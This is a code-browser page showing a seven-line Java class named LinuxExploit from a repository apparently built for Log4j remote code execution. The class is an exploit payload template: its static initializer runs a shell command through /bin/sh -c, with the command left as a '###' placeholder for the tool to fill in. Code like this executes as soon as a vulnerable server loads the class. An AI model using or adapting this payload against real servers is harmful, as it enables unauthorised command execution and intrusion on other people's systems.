Code
Hub
Workspaces
Following
Trending
Connect
MCP
copy
Create free account
hub
/
github.com/alexandre-lavoie/python-log4rce
/ LinuxExploit
Class
LinuxExploit
java/LinuxExploit.java:1–7 ·
view source on GitHub ↗
Source
from the content-addressed store, hash-verified
1
public
class
LinuxExploit {
2
static
{
3
try {
4
Runtime.getRuntime().exec(
new
String[]{
"/bin/sh"
,
"-c"
,
"###"
});
5
} catch(Exception e) {}
6
}
7
}
Callers
nothing calls this directly
Calls
no outgoing calls
Tested by
no test coverage detected